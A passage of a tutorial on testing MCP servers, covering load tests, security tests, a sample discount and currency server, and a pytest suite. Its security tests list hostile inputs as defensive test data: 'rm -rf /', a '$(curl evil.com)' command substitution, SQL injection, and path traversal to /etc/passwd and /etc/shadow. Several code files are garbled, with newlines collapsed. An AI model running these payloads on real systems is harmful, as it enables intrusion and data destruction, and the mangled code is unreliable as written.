Task: Write a JSON Schema that validates the response structure for this tool. Consider:

  • What fields should be in the result?
  • What data types should they have?
  • What fields are required vs optional?
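One possible starting point (an illustrative sketch, not the only valid answer) mirrors the MCP text-content response shape used elsewhere in this tutorial:

```json
{
    "type": "object",
    "properties": {
        "content": {
            "type": "array",
            "minItems": 1,
            "items": {
                "type": "object",
                "properties": {
                    "type": {"type": "string", "enum": ["text"]},
                    "text": {"type": "string"}
                },
                "required": ["type", "text"]
            }
        }
    },
    "required": ["content"]
}
```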
Module 2.4

Performance & Load Testing

Performance Testing for MCP Servers

Performance testing validates that your MCP server can handle expected load while maintaining acceptable response times and resource usage.

Key Performance Metrics

Metric Description Target
Response Time Time from request to response < 100ms (p95)
Throughput Requests per second 100+ RPS
Latency (p99) 99th percentile response time < 500ms
Error Rate Failed requests percentage < 0.1%
CPU Usage Server CPU consumption < 70%
Memory Usage RAM consumption No leaks

Throughput Validation

Test how many requests the server can handle per second:

import asyncio
import time

async def load_test_throughput():
    """Test server throughput with concurrent requests"""
    num_requests = 1000

    async def make_request():
        request = {
            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {
                "name": "calculate_discount",
                "arguments": {"original_price": 100, "discount_percent": 20}
            }
        }
        return await client.send_async(request)

    # Execute concurrent requests
    start_time = time.time()
    tasks = [make_request() for _ in range(num_requests)]
    results = await asyncio.gather(*tasks, return_exceptions=True)
    duration = time.time() - start_time

    # Calculate metrics
    successful = sum(1 for r in results if not isinstance(r, Exception))
    failed = num_requests - successful
    throughput = num_requests / duration

    print(f"Total requests: {num_requests}")
    print(f"Successful: {successful}")
    print(f"Failed: {failed}")
    print(f"Duration: {duration:.2f}s")
    print(f"Throughput: {throughput:.2f} req/s")

    assert throughput >= 100, f"Throughput {throughput:.2f} req/s below target"
    assert failed / num_requests < 0.001, "Error rate too high"

Latency Benchmarking

import time

import numpy as np

def test_latency_percentiles():
    """Measure the response time distribution"""
    num_samples = 100
    response_times = []

    for i in range(num_samples):
        start = time.time()
        client.send({
            "jsonrpc": "2.0",
            "id": i,
            "method": "tools/call",
            "params": {
                "name": "calculate_discount",
                "arguments": {"original_price": 100, "discount_percent": 20}
            }
        })
        response_times.append((time.time() - start) * 1000)  # Convert to ms

    # Calculate percentiles
    p50 = np.percentile(response_times, 50)
    p95 = np.percentile(response_times, 95)
    p99 = np.percentile(response_times, 99)

    print("Response Time Distribution:")
    print(f"  p50 (median): {p50:.2f}ms")
    print(f"  p95: {p95:.2f}ms")
    print(f"  p99: {p99:.2f}ms")

    # Assertions
    assert p95 < 100, f"p95 latency {p95:.2f}ms exceeds 100ms target"
    assert p99 < 500, f"p99 latency {p99:.2f}ms exceeds 500ms target"

Concurrent Tool Invocation Tests

from concurrent.futures import ThreadPoolExecutor

def test_concurrent_same_tool():
    """Test calling the same tool concurrently"""
    num_concurrent = 20
    with ThreadPoolExecutor(max_workers=num_concurrent) as executor:
        futures = [
            executor.submit(client.send, {
                "jsonrpc": "2.0",
                "id": i,
                "method": "tools/call",
                "params": {
                    "name": "calculate_discount",
                    "arguments": {"original_price": 100 + i, "discount_percent": 20}
                }
            })
            for i in range(num_concurrent)
        ]

        # Wait for all to complete
        results = [f.result(timeout=10) for f in futures]

    # Verify all succeeded
    for result in results:
        assert "result" in result, "Request failed"
        assert "error" not in result

def test_concurrent_different_tools():
    """Test calling different tools concurrently"""
    tools = ["calculate_discount", "currency_converter", "weather_forecast"]
    with ThreadPoolExecutor(max_workers=len(tools)) as executor:
        futures = {executor.submit(call_tool, tool): tool for tool in tools}

        for future in futures:
            tool_name = futures[future]
            try:
                result = future.result(timeout=5)
                assert "result" in result
            except Exception as e:
                pytest.fail(f"Tool {tool_name} failed: {e}")

Resource Exhaustion Tests

Test 1: Memory Leak Detection
  • Monitor memory usage over 1000+ requests
  • Memory should remain stable
  • No continuous growth pattern

Test 2: Connection Pool Exhaustion
  • Open 100+ concurrent connections
  • Verify the server handles them gracefully
  • Check for connection timeout errors

Test 3: Large Payload Handling
  • Send tool calls with 1MB+ parameters
  • Verify the server doesn't crash
  • Check memory cleanup after processing

Test 4: Rapid Connect/Disconnect
  • Connect and disconnect 50 times rapidly
  • Check for resource leaks
  • Verify cleanup happens correctly
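Test 1 can be sketched with Python's built-in tracemalloc module. This is an illustrative harness: the `handle_request` function below is a hypothetical stand-in for the real server handler, and the 1 MB growth threshold is an assumed slack value.

```python
import tracemalloc

def handle_request(payload: dict) -> dict:
    # Hypothetical stand-in for the real server's request handler
    return {"jsonrpc": "2.0", "id": payload["id"], "result": {"content": []}}

def test_no_memory_growth():
    """Memory after 1000+ requests should stay close to the warmed-up baseline."""
    # Warm up so caches and interned objects don't count as "growth"
    for i in range(100):
        handle_request({"jsonrpc": "2.0", "id": i, "method": "tools/list"})

    tracemalloc.start()
    baseline, _ = tracemalloc.get_traced_memory()

    for i in range(1000):
        handle_request({"jsonrpc": "2.0", "id": i, "method": "tools/list"})

    current, _ = tracemalloc.get_traced_memory()
    tracemalloc.stop()

    growth = current - baseline
    # Allow some slack; a real leak grows roughly linearly with request count
    assert growth < 1_000_000, f"Memory grew by {growth} bytes over 1000 requests"
```

A genuine leak shows up as growth proportional to the number of requests, so re-running with 10x the requests and comparing growth is a useful follow-up check.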

🧪 Design a Load Test

Scenario: Your MCP server will be used by 100 concurrent AI agents, each making 10 tool calls per minute.

Calculate:

  • What's the expected requests per second?
  • What's a reasonable p95 latency target?
  • How would you simulate this load?

Design: Write pseudocode for a load test that validates this scenario.
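As a starting point for the arithmetic: 100 agents × 10 calls/minute is 1,000 calls/minute, or roughly 16.7 requests per second sustained. A minimal sketch of that calculation:

```python
def expected_load(agents: int, calls_per_minute: int) -> float:
    """Convert an agent population into a sustained requests-per-second figure."""
    return agents * calls_per_minute / 60.0

rps = expected_load(agents=100, calls_per_minute=10)
print(f"Expected sustained load: {rps:.1f} req/s")  # → Expected sustained load: 16.7 req/s
```

A reasonable p95 target would then come from the steady-state latency benchmarks in the previous section, with headroom for bursts when many agents fire at once.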

Module 2.5

Security Testing

Security Testing for MCP Servers

Security testing is critical for MCP servers because they often have access to sensitive data, APIs, and can execute arbitrary operations. As a QA engineer, you must validate security boundaries.

⚠️ Security First

MCP servers are privileged components in AI systems. A compromised server can leak data, corrupt systems, or enable unauthorized actions. Security testing is not optional.

Threat Model for MCP Servers

Threat Attack Vector Test Strategy
Prompt Injection Malicious input in tool parameters Inject commands in strings
Schema Poisoning Manipulated tool schemas Send malformed schemas
Data Exfiltration Unauthorized data access Test access controls
Privilege Escalation Bypass authorization checks Attempt restricted operations
DoS/Resource Exhaustion Overwhelming requests Send massive payloads

1. Prompt Injection Testing

Test if malicious input can manipulate server behavior:

def test_prompt_injection_attempts():
    """Test various prompt injection techniques"""
    injection_payloads = [
        # Command injection
        "; rm -rf /",
        "$(curl evil.com)",
        # SQL injection patterns
        "'; DROP TABLE users; --",
        "1' OR '1'='1",
        # Path traversal
        "../../../etc/passwd",
        "....//....//....//etc/passwd",
        # Script injection
        "<script>alert('XSS')</script>",
        "javascript:alert(1)",
        # Template injection
        "{{7*7}}",
        "${7*7}",
        # LDAP injection
        "*)(uid=*))(|(uid=*",
    ]

    for payload in injection_payloads:
        request = {
            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {
                "name": "search_files",
                "arguments": {"query": payload}
            }
        }

        response = client.send(request)

        # The server should handle this safely: either sanitize or reject
        if "result" in response:
            # The result must not contain evidence of an executed payload
            result_text = str(response["result"])
            assert "etc/passwd" not in result_text
            assert "DROP TABLE" not in result_text
        elif "error" in response:
            # An error is acceptable: the server rejected dangerous input
            pass
        else:
            pytest.fail("Unexpected response format")

2. Malformed Tool Payloads

def test_malformed_payloads():
    """Test the server's resilience to malformed requests"""
    # Build a deeply nested structure programmatically
    deeply_nested = "..."
    for _ in range(1000):
        deeply_nested = {"a": deeply_nested}

    malformed_requests = [
        # Missing required fields
        {"jsonrpc": "2.0", "method": "tools/call"},

        # Wrong JSON-RPC version
        {"jsonrpc": "1.0", "id": 1, "method": "tools/call", "params": {}},

        # Invalid method name
        {"jsonrpc": "2.0", "id": 1, "method": "/../../../etc/passwd", "params": {}},

        # Oversized payload
        {
            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {"name": "test", "arguments": {"data": "X" * 10_000_000}}
        },

        # Deeply nested structure (1000 levels)
        {"jsonrpc": "2.0", "id": 1, "method": "tools/call", "params": deeply_nested},

        # NULL bytes
        {"jsonrpc": "2.0", "id": 1, "method": "tools\x00/call", "params": {}},
    ]

    for malformed in malformed_requests:
        try:
            response = client.send(malformed)
            # The server should return a proper error, not crash
            assert "error" in response
            assert response["error"]["code"] in [-32700, -32600, -32602]
        except Exception as e:
            # Connection errors are acceptable (server protecting itself)
            print(f"Server rejected malformed request: {e}")

3. Input Fuzzing

import random
import string

def test_input_fuzzing():
    """Fuzz-test tool inputs"""

    def generate_fuzz_string(length):
        """Generate random fuzz input"""
        chars = string.printable + "".join(chr(i) for i in range(128, 256))
        return "".join(random.choice(chars) for _ in range(length))

    fuzz_cases = [
        # Random strings
        generate_fuzz_string(100),
        generate_fuzz_string(1000),

        # Unicode edge cases
        "\u0000" * 100,   # NULL characters
        "\uffff" * 100,   # Max BMP code point
        "🔥" * 100,       # Emoji

        # Format strings
        "%s" * 100,
        "%n" * 100,

        # Boundary integers
        2**31 - 1,        # Max int32
        2**63 - 1,        # Max int64
        -2**63,           # Min int64
    ]

    for fuzz_input in fuzz_cases:
        request = {
            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {
                "name": "process_text",
                "arguments": {"text": fuzz_input}
            }
        }

        try:
            response = client.send(request)
            # The server should handle this gracefully, not crash
            assert "result" in response or "error" in response
        except Exception as e:
            # Network errors are acceptable if the server protects itself
            print(f"Fuzz input caused: {e}")

4. Authorization Testing

Test Case: Unauthorized Tool Access
  Given: User has permission for the "read_data" tool only
  When: User attempts to call the "delete_data" tool
  Then: Server returns a 403 Forbidden error

Test Case: Token Validation
  Given: A valid authentication token is required
  When: A request is sent without a token
  Then: Server rejects with an authentication error

Test Case: Expired Token
  Given: Token expired 1 hour ago
  When: A request is sent with the expired token
  Then: Server rejects and requests re-authentication

Test Case: Token Tampering
  Given: A valid token signature
  When: The token payload is modified
  Then: Server detects the tampering and rejects
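The unauthorized-tool-access case can be sketched as a unit test against a simple permission map. The `authorize` helper, `AuthorizationError`, and permission table below are illustrative assumptions standing in for the server's real auth layer, not part of the MCP SDK:

```python
# Hypothetical per-user tool permissions
PERMISSIONS = {"alice": {"read_data"}}

class AuthorizationError(Exception):
    """Raised when a user calls a tool outside their permission set."""

def authorize(user: str, tool_name: str) -> None:
    """Raise AuthorizationError if the user may not call the tool."""
    if tool_name not in PERMISSIONS.get(user, set()):
        raise AuthorizationError(f"{user} may not call {tool_name}")

def test_unauthorized_tool_access():
    # An allowed tool passes silently
    authorize("alice", "read_data")
    # A restricted tool must be rejected
    try:
        authorize("alice", "delete_data")
    except AuthorizationError:
        pass
    else:
        raise AssertionError("Expected AuthorizationError for delete_data")
```

In a real suite the same assertion would be made end-to-end: send the restricted `tools/call` over the wire and assert the server's error response rather than calling the helper directly.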

5. Data Validation Security

import json

def test_data_sanitization():
    """Test that the server sanitizes dangerous data"""
    test_cases = [
        {
            "name": "HTML Injection",
            "input": "<img src=x onerror=alert('XSS')>",
            "should_not_contain": ["<img", "onerror", "alert"]
        },
        {
            "name": "LDAP Injection",
            "input": "admin*",
            "should_not_contain": ["*"]  # Wildcards should be escaped
        },
        {
            "name": "XML Injection",
            "input": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>",
            "should_not_contain": ["<!ENTITY", "SYSTEM"]
        },
    ]

    for test in test_cases:
        response = client.call_tool("process_input", {"data": test["input"]})
        result_text = json.dumps(response)
        for dangerous_string in test["should_not_contain"]:
            assert dangerous_string not in result_text, \
                f"{test['name']}: Dangerous string '{dangerous_string}' not sanitized"

Sample Malicious Payloads

// 1. Path Traversal Attempt
{
    "name": "read_file",
    "arguments": {"path": "../../../../etc/shadow"}
}

// 2. Command Injection
{
    "name": "execute_command",
    "arguments": {"command": "ls; cat /etc/passwd"}
}

// 3. SQL Injection
{
    "name": "search_users",
    "arguments": {"query": "' OR '1'='1' --"}
}

// 4. Buffer Overflow Attempt
{
    "name": "process_data",
    "arguments": {"data": "A" * 1000000}
}

// 5. Resource Exhaustion
{
    "name": "calculate",
    "arguments": {"iterations": 999999999999}
}
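Payloads like these are convenient to drive through a single parametrized check. A minimal sketch for the path-traversal case, assuming a hypothetical `is_safe_path` validator standing in for the server's real path handling and an illustrative base directory:

```python
import os

def is_safe_path(base_dir: str, requested: str) -> bool:
    """Reject any requested path that resolves outside the allowed base directory."""
    resolved = os.path.realpath(os.path.join(base_dir, requested))
    return resolved.startswith(os.path.realpath(base_dir) + os.sep)

def test_path_traversal_payloads():
    # Traversal attempts must be rejected
    for payload in ["../../../../etc/shadow", "../../etc/passwd"]:
        assert not is_safe_path("/srv/mcp-data", payload), payload
    # A legitimate relative path is still allowed
    assert is_safe_path("/srv/mcp-data", "reports/q1.txt")
```

Resolving with `os.path.realpath` before the prefix check is the key design choice: naive string filtering of `../` is exactly what tricks like `....//` are built to bypass.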

🧪 Security Test Design

Scenario: Your MCP server has a "database_query" tool that executes SQL queries.

Task: Design 5 security tests covering:

  1. SQL injection prevention
  2. Unauthorized table access
  3. Query timeout enforcement
  4. Dangerous SQL command blocking (DROP, DELETE ALL)
  5. Information disclosure prevention
Module 3.1

Hands-On Project Setup

Project Overview

We're going to build and test a real MCP server with two tools:

  • calculate_discount: Calculate discounted prices
  • currency_converter: Convert between currencies

Project Structure

mcp-discount-server/
├── src/
│   ├── server.py              # Main MCP server
│   ├── tools/
│   │   ├── __init__.py
│   │   ├── discount.py        # Discount calculator tool
│   │   └── currency.py        # Currency converter tool
│   └── config.py              # Configuration
├── tests/
│   ├── __init__.py
│   ├── test_server.py         # Server tests
│   ├── test_discount.py       # Discount tool tests
│   ├── test_currency.py       # Currency tool tests
│   ├── test_contract.py       # Contract tests
│   ├── test_performance.py    # Performance tests
│   └── test_security.py       # Security tests
├── requirements.txt
├── pytest.ini
└── README.md

Dependencies

# requirements.txt
mcp>=0.1.0
pytest>=7.4.0
pytest-asyncio>=0.21.0
jsonschema>=4.19.0
aiohttp>=3.8.0
requests>=2.31.0

Server Implementation (Python)

Main Server (src/server.py)

"" "
 MCP Discount & Currency Server A sample MCP server demonstrating tool implementation and testing "" "


        from mcp.server import Server from mcp.types import Tool,
        TextContent import json # Import our tools from tools.discount import calculate_discount from tools.currency import convert_currency # Initialize MCP server server=Server("discount-currency-server") @server.list_tools() async def list_tools() ->list[Tool]: "" "
 List all available tools This is called during capability negotiation "" "
 return [ Tool(name="calculate_discount",
            description="Calculate discounted price based on original price and discount percentage",
            inputSchema= {

                "type": "object",
                "properties": {
                    "original_price": {
                        "type": "number",
                        "description": "Original price before discount",
                        "minimum": 0
                    }

                    ,
                    "discount_percent": {
                        "type": "number",
                        "description": "Discount percentage (0-100)",
                        "minimum": 0,
                        "maximum": 100
                    }
                }

                ,
                "required": ["original_price", "discount_percent"]

            }),
        Tool(name="currency_converter",
            description="Convert amount from one currency to another",
            inputSchema= {

                "type": "object",
                "properties": {
                    "amount": {
                        "type": "number",
                        "description": "Amount to convert",
                        "minimum": 0
                    }

                    ,
                    "from_currency": {
                        "type": "string",
                        "description": "Source currency code (e.g., USD)",
                        "pattern": "^[A-Z]{3}$"
                    }

                    ,
                    "to_currency": {
                        "type": "string",
                        "description": "Target currency code (e.g., EUR)",
                        "pattern": "^[A-Z]{3}$"
                    }
                }

                ,
                "required": ["amount", "from_currency", "to_currency"]
            })] @server.call_tool() async def call_tool(name: str, arguments: dict) ->list[TextContent]: "" "
 Execute a tool with given arguments "" "

        # Route to appropriate tool handler if name=="calculate_discount": result=calculate_discount(arguments["original_price"],
            arguments["discount_percent"]) return [TextContent(type="text", text=result)] elif name=="currency_converter": result=convert_currency(arguments["amount"],
            arguments["from_currency"],
            arguments["to_currency"]) return [TextContent(type="text", text=result)] else: raise ValueError(f"Unknown tool: {name}") async def main(): "" "Start the MCP server" ""
        from mcp.server.stdio import stdio_server async with stdio_server() as (read_stream, write_stream): await server.run(read_stream,
            write_stream,
            server.create_initialization_options()) if __name__=="__main__": import asyncio asyncio.run(main())

Discount Tool (src/tools/discount.py)

"" "
 Discount calculation tool "" "

        def calculate_discount(original_price: float, discount_percent: float) ->str: "" "
 Calculate discounted price Args: original_price: Original price before discount discount_percent: Discount percentage (0-100) Returns: Formatted string with discounted price Raises: ValueError: If inputs are invalid "" "

        # Input validation if original_price < 0: raise ValueError("Original price cannot be negative") if discount_percent < 0 or discount_percent>100: raise ValueError("Discount percent must be between 0 and 100") # Calculate discount discount_amount=original_price * (discount_percent / 100) final_price=original_price - discount_amount # Format response return (f"Discounted price: ${final_price:.2f} "
            f"({discount_percent}% off ${original_price:.2f})"
        )
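A quick sanity check of the formatting logic (a condensed, standalone copy of `calculate_discount` so the snippet runs on its own):

```python
def calculate_discount(original_price: float, discount_percent: float) -> str:
    # Condensed copy of src/tools/discount.py for a standalone check
    if original_price < 0:
        raise ValueError("Original price cannot be negative")
    if discount_percent < 0 or discount_percent > 100:
        raise ValueError("Discount percent must be between 0 and 100")
    final_price = original_price - original_price * (discount_percent / 100)
    return (f"Discounted price: ${final_price:.2f} "
            f"({discount_percent}% off ${original_price:.2f})")

print(calculate_discount(100.00, 20))
# → Discounted price: $80.00 (20% off $100.00)
```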

Currency Tool (src/tools/currency.py)

"" "
 Currency conversion tool Note: Uses mock exchange rates for demo purposes "" "


        # Mock exchange rates (relative to USD) EXCHANGE_RATES= {
            "USD": 1.0,
                "EUR": 0.85,
                "GBP": 0.73,
                "JPY": 110.0,
                "CAD": 1.25,
                "AUD": 1.35,
        }

        def convert_currency(amount: float, from_currency: str, to_currency: str) ->str: "" "
 Convert amount between currencies Args: amount: Amount to convert from_currency: Source currency code (e.g., "USD") to_currency: Target currency code (e.g., "EUR") Returns: Formatted string with converted amount Raises: ValueError: If currency codes are invalid "" "

        # Input validation if amount < 0: raise ValueError("Amount cannot be negative") if from_currency not in EXCHANGE_RATES: raise ValueError(f"Unsupported currency: {from_currency}") if to_currency not in EXCHANGE_RATES: raise ValueError(f"Unsupported currency: {to_currency}") # Convert to USD first,
        then to target currency amount_in_usd=amount / EXCHANGE_RATES[from_currency] converted_amount=amount_in_usd * EXCHANGE_RATES[to_currency] # Format response return (f"{amount:.2f} {from_currency} = "
            f"{converted_amount:.2f} {to_currency}"
        )
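And a quick check of the conversion path (again a condensed, standalone copy with a subset of the mock rates so the snippet runs on its own):

```python
# Condensed copy of src/tools/currency.py for a standalone check
EXCHANGE_RATES = {"USD": 1.0, "EUR": 0.85, "GBP": 0.73}

def convert_currency(amount: float, from_currency: str, to_currency: str) -> str:
    if from_currency not in EXCHANGE_RATES or to_currency not in EXCHANGE_RATES:
        raise ValueError("Unsupported currency")
    # Convert to USD first, then to the target currency
    converted = amount / EXCHANGE_RATES[from_currency] * EXCHANGE_RATES[to_currency]
    return f"{amount:.2f} {from_currency} = {converted:.2f} {to_currency}"

print(convert_currency(100.00, "USD", "EUR"))
# → 100.00 USD = 85.00 EUR
```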
✅ Setup Complete

You now have a working MCP server! In the next sections, we'll write comprehensive tests for it.

Module 3.2

Manual Testing Steps

Testing the MCP Server Manually

Before automating tests, let's manually verify the server works correctly.

1. Start the Server

$ cd mcp-discount-server
$ python src/server.py

2. Test Tool Discovery

Request: List Available Tools

{
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/list"
}

        

Expected Response:

{
    "jsonrpc": "2.0",
    "id": 1,
    "result": {
        "tools": [
            {
                "name": "calculate_discount",
                "description": "Calculate discounted price...",
                "inputSchema": { /* schema */ }
            },
            {
                "name": "currency_converter",
                "description": "Convert amount...",
                "inputSchema": { /* schema */ }
            }
        ]
    }
}

        

3. Test Discount Calculator

Test Case 1: Valid Discount

// Request
{
    "jsonrpc": "2.0",
    "id": 2,
    "method": "tools/call",
    "params": {
        "name": "calculate_discount",
        "arguments": {
            "original_price": 100.00,
            "discount_percent": 20
        }
    }
}

// Expected Response
{
    "jsonrpc": "2.0",
    "id": 2,
    "result": {
        "content": [
            {
                "type": "text",
                "text": "Discounted price: $80.00 (20% off $100.00)"
            }
        ]
    }
}

        

Test Case 2: Invalid Discount (> 100)

// Request
{
    "jsonrpc": "2.0",
    "id": 3,
    "method": "tools/call",
    "params": {
        "name": "calculate_discount",
        "arguments": {
            "original_price": 100.00,
            "discount_percent": 150
        }
    }
}

// Expected Response
{
    "jsonrpc": "2.0",
    "id": 3,
    "error": {
        "code": -32602,
        "message": "Invalid params",
        "data": {
            "details": "Discount percent must be between 0 and 100"
        }
    }
}

        

4. Test Currency Converter

Test Case 1: USD to EUR

// Request
{
    "jsonrpc": "2.0",
    "id": 4,
    "method": "tools/call",
    "params": {
        "name": "currency_converter",
        "arguments": {
            "amount": 100.00,
            "from_currency": "USD",
            "to_currency": "EUR"
        }
    }
}

// Expected Response
{
    "jsonrpc": "2.0",
    "id": 4,
    "result": {
        "content": [
            {
                "type": "text",
                "text": "100.00 USD = 85.00 EUR"
            }
        ]
    }
}

        

Test Case 2: Invalid Currency Code

// Request
{
    "jsonrpc": "2.0",
    "id": 5,
    "method": "tools/call",
    "params": {
        "name": "currency_converter",
        "arguments": {
            "amount": 100.00,
            "from_currency": "USD",
            "to_currency": "XYZ" // Invalid currency
        }
    }
}

// Expected Response
{
    "jsonrpc": "2.0",
    "id": 5,
    "error": {
        "code": -32602,
        "message": "Invalid params",
        "data": {
            "details": "Unsupported currency: XYZ"
        }
    }
}

        

Manual Testing Checklist

Test Status Notes
Server starts successfully ✓ / ✗
Tools/list returns 2 tools ✓ / ✗
Discount: Valid input works ✓ / ✗
Discount: Negative price fails ✓ / ✗
Discount: >100% fails ✓ / ✗
Currency: Valid conversion works ✓ / ✗
Currency: Invalid code fails ✓ / ✗
Non-existent tool returns error ✓ / ✗
🧪 Manual Testing Exercise

Task: Manually test the following scenarios and document the results:

  1. Calculate discount with 0% discount
  2. Calculate discount with 100% discount
  3. Convert 0 USD to EUR
  4. Convert same currency (USD to USD)
  5. Call a tool that doesn't exist
  6. Send malformed JSON

For each test, record: input, expected output, actual output, pass/fail

Module 3.3

Test Automation Implementation

Automated Test Suite

Now let's automate our tests using Pytest.

Test Configuration (pytest.ini)

[pytest]
testpaths = tests
python_files = test_*.py
python_classes = Test*
python_functions = test_*
asyncio_mode = auto
markers =
    unit: Unit tests
    integration: Integration tests
    security: Security tests
    performance: Performance tests

Test Fixtures (tests/conftest.py)

"" "
 Pytest fixtures for MCP server testing "" "
 import pytest from mcp.client import Client import asyncio @pytest.fixture async def mcp_client(): "" "Create MCP client connected to test server" ""
        client=Client() await client.connect() yield client await client.disconnect() @pytest.fixture def sample_discount_params(): "" "Sample valid parameters for discount tool" ""

        return {
            "original_price": 100.00,
                "discount_percent": 20
        }

        @pytest.fixture def sample_currency_params(): "" "Sample valid parameters for currency tool" ""

        return {
            "amount": 100.00,
                "from_currency": "USD",
                "to_currency": "EUR"
        }

        

Functional Tests (tests/test_discount.py)

"" "
 Functional tests for discount calculator tool "" "
 import pytest @pytest.mark.unit async def test_calculate_discount_valid_input(mcp_client, sample_discount_params): "" "Test discount calculation with valid inputs" ""
        result=await mcp_client.call_tool("calculate_discount",
            sample_discount_params) assert "result" in result assert "Discounted price: $80.00" in result["result"]["content"][0]["text"] @pytest.mark.unit async def test_calculate_discount_zero_percent(mcp_client): "" "Test with 0% discount" ""

        result=await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100.00, "discount_percent": 0
        }) assert "Discounted price: $100.00" in result["result"]["content"][0]["text"] @pytest.mark.unit async def test_calculate_discount_hundred_percent(mcp_client): "" "Test with 100% discount" ""

        result=await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100.00, "discount_percent": 100
        }) assert "Discounted price: $0.00" in result["result"]["content"][0]["text"] @pytest.mark.unit async def test_calculate_discount_negative_price(mcp_client): "" "Test that negative price returns error" ""

        with pytest.raises(ValueError, match="cannot be negative"): await mcp_client.call_tool("calculate_discount",
            {
            "original_price": -50.00, "discount_percent": 20
        }) @pytest.mark.unit async def test_calculate_discount_invalid_percent(mcp_client): "" "Test that discount > 100 returns error" ""

        with pytest.raises(ValueError, match="must be between 0 and 100"): await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100.00, "discount_percent": 150
        }) @pytest.mark.unit async def test_calculate_discount_missing_field(mcp_client): "" "Test that missing required field returns error" ""

        with pytest.raises(Exception): # Should be validation error await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100.00
        }

        # Missing discount_percent) @pytest.mark.unit @pytest.mark.parametrize("price,discount,expected", [ (100, 10, "$90.00"),
            (50.50, 25, "$37.88"),
            (999.99, 33, "$670.19"),
            (0.01, 50, "$0.01"),
            ]) async def test_calculate_discount_parametrized(mcp_client, price, discount, expected): "" "Test multiple discount scenarios" ""

        result=await mcp_client.call_tool("calculate_discount",
            {
            "original_price": price, "discount_percent": discount
        }) assert expected in result["result"]["content"][0]["text"]

Contract Tests (tests/test_contract.py)

"""
Contract tests for MCP server
"""
import pytest
import jsonschema

@pytest.mark.integration
async def test_tools_list_contract(mcp_client):
    """Verify tools/list response matches contract"""
    expected_schema = {
        "type": "object",
        "properties": {
            "tools": {
                "type": "array",
                "minItems": 2,
                "items": {
                    "type": "object",
                    "properties": {
                        "name": {"type": "string"},
                        "description": {"type": "string"},
                        "inputSchema": {"type": "object"}
                    },
                    "required": ["name", "inputSchema"]
                }
            }
        },
        "required": ["tools"]
    }
    result = await mcp_client.list_tools()
    jsonschema.validate(result, expected_schema)

@pytest.mark.integration
async def test_tool_response_structure(mcp_client):
    """Verify tool call response structure"""
    result = await mcp_client.call_tool("calculate_discount", {
        "original_price": 100,
        "discount_percent": 20
    })
    # Check JSON-RPC structure
    assert "jsonrpc" in result
    assert result["jsonrpc"] == "2.0"
    assert "id" in result
    assert "result" in result
    # Check result structure
    assert "content" in result["result"]
    assert isinstance(result["result"]["content"], list)
    assert len(result["result"]["content"]) > 0
    assert result["result"]["content"][0]["type"] == "text"
    assert "text" in result["result"]["content"][0]
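Contract coverage should include the failure path as well. A stdlib-only sketch of an error-envelope check follows; the sample payload is hand-written here to match the JSON-RPC 2.0 error shape (-32602 is the spec's "Invalid params" code):

```python
import json

def validate_error_envelope(payload: dict) -> None:
    """Assert a response is a well-formed JSON-RPC 2.0 error envelope."""
    assert payload.get("jsonrpc") == "2.0"
    assert "id" in payload
    assert "result" not in payload  # error and result are mutually exclusive
    error = payload["error"]
    assert isinstance(error["code"], int)
    assert isinstance(error["message"], str)

# Hand-written sample of what a server should return for bad params
sample = json.loads("""
{
  "jsonrpc": "2.0",
  "id": 7,
  "error": {"code": -32602, "message": "Invalid params: discount_percent is required"}
}
""")
validate_error_envelope(sample)
```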

Performance Tests (tests/test_performance.py)

"""
Performance tests for MCP server
"""
import pytest
import asyncio
import time
import numpy as np

@pytest.mark.performance
async def test_response_time(mcp_client):
    """Test that response time is under 100ms"""
    start = time.time()
    await mcp_client.call_tool("calculate_discount", {
        "original_price": 100,
        "discount_percent": 20
    })
    end = time.time()
    response_time = (end - start) * 1000  # Convert to ms
    assert response_time < 100, f"Response time {response_time}ms exceeds 100ms"

@pytest.mark.performance
async def test_concurrent_requests(mcp_client):
    """Test server handles 10 concurrent requests"""
    async def make_request():
        return await mcp_client.call_tool("calculate_discount", {
            "original_price": 100,
            "discount_percent": 20
        })

    # Execute 10 concurrent requests
    tasks = [make_request() for _ in range(10)]
    results = await asyncio.gather(*tasks)

    # Verify all succeeded
    assert len(results) == 10
    for result in results:
        assert "result" in result

@pytest.mark.performance
async def test_latency_percentiles(mcp_client):
    """Measure p50, p95, p99 latency"""
    latencies = []
    for _ in range(100):
        start = time.time()
        await mcp_client.call_tool("calculate_discount", {
            "original_price": 100,
            "discount_percent": 20
        })
        end = time.time()
        latencies.append((end - start) * 1000)

    p50 = np.percentile(latencies, 50)
    p95 = np.percentile(latencies, 95)
    p99 = np.percentile(latencies, 99)

    print("\nLatency percentiles:")
    print(f"  p50: {p50:.2f}ms")
    print(f"  p95: {p95:.2f}ms")
    print(f"  p99: {p99:.2f}ms")

    assert p95 < 100, f"p95 latency {p95}ms exceeds target"
    assert p99 < 500, f"p99 latency {p99}ms exceeds target"
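If pulling in numpy just for percentiles feels heavy, the standard library can compute them; a sketch using `statistics.quantiles` (with `n=100`, the function returns the 99 cut points between percentiles, so index `pct - 1` is the pct-th percentile):

```python
import statistics

def percentile(latencies: list[float], pct: int) -> float:
    """Approximate the pct-th percentile using stdlib statistics."""
    # quantiles(..., n=100) returns 99 cut points; index pct-1
    # corresponds to the pct-th percentile.
    cuts = statistics.quantiles(latencies, n=100, method="inclusive")
    return cuts[pct - 1]

latencies = [float(i) for i in range(1, 101)]  # 1ms..100ms dummy data
p50 = percentile(latencies, 50)
p95 = percentile(latencies, 95)
```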

Security Tests (tests/test_security.py)

"""
Security tests for MCP server
"""
import pytest

@pytest.mark.security
async def test_sql_injection_in_params(mcp_client):
    """Test SQL injection attempts are handled safely"""
    sql_injections = [
        "'; DROP TABLE users; --",
        "1' OR '1'='1",
        "admin' --",
    ]
    for injection in sql_injections:
        # Should handle gracefully - either reject or sanitize
        try:
            result = await mcp_client.call_tool("calculate_discount", {
                "original_price": injection,
                "discount_percent": 20
            })
            # If it succeeds, check the result doesn't contain the injection
            assert "DROP TABLE" not in str(result)
        except Exception:
            # Error is acceptable - server rejected malicious input
            pass

@pytest.mark.security
